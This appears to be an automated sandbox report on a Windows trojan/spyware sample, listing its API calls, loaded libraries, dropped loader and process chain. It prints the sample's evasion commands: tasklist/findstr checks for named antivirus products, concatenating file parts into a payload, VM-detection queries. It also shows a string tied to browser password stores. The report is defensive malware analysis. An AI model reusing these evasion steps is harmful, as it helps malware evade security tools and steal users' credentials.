Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DF6ADE	10_2_00DF6ADE
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E32A05	10_2_00E32A05
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E28BFF	10_2_00E28BFF
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DDCD7A	10_2_00DDCD7A
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DECE10	10_2_00DECE10
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DF7159	10_2_00DF7159
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DC9240	10_2_00DC9240
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E55311	10_2_00E55311
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DC96E0	10_2_00DC96E0
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE1704	10_2_00DE1704
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE1A76	10_2_00DE1A76
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE7B8B	10_2_00DE7B8B
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DC9B60	10_2_00DC9B60
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE7DBA	10_2_00DE7DBA
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE1D20	10_2_00DE1D20
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DE1FE7	10_2_00DE1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\19152\Appliance.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: String function: 00DDFD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: String function: 00DE0DA0 appears 46 times
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: String function: 004062CF appears 58 times

Source: HouseholdsClicking.exe

Static PE information: invalid certificate

Source: HouseholdsClicking.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/21@12/2

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E341FA GetLastError,FormatMessageW,

10_2_00E341FA

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E22010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		10_2_00E22010
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E21A0B AdjustTokenPrivileges,CloseHandle,		10_2_00E21A0B

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

0_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E2DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_00E2DD87

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00E33A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

10_2_00E33A0E

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

File created: C:\Users\user\AppData\Local\Temp\nse5A80.tmp

Jump to behavior

Source: HouseholdsClicking.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Appliance.com, 0000000A.00000003.2036642508.0000000004338000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036468710.0000000004367000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036326757.0000000004434000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: HouseholdsClicking.exe	Virustotal: Detection: 69%
Source: HouseholdsClicking.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

File read: C:\Users\user\Desktop\HouseholdsClicking.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HouseholdsClicking.exe "C:\Users\user\Desktop\HouseholdsClicking.exe"
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 19152
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Bookmarks" Sv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com Appliance.com M
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 19152	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Bookmarks" Sv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com Appliance.com M	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: HouseholdsClicking.exe

Static file information: File size 1051945 > 1048576

Source: HouseholdsClicking.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\HouseholdsClicking.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: HouseholdsClicking.exe

Static PE information: real checksum: 0x108ea2 should be: 0x1099a0

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DE0DE6 push ecx; ret

10_2_00DE0DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E526DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		10_2_00E526DD
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DDFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		10_2_00DDFC7C

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

API coverage: 3.9 %

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com TID: 6844

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\HouseholdsClicking.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E2DC54
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E3A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E3A087
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E3A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E3A1E2
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00E2E472
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E3A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	10_2_00E3A570
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E366DC FindFirstFileW,FindNextFileW,FindClose,	10_2_00E366DC
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00DFC622 FindFirstFileExW,	10_2_00DFC622
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E373D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	10_2_00E373D4
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E37333 FindFirstFileW,FindClose,	10_2_00E37333
Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com	Code function: 10_2_00E2D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E2D921

Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Code function: 10_2_00DC5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00DC5FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\19152\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\19152	Jump to behavior
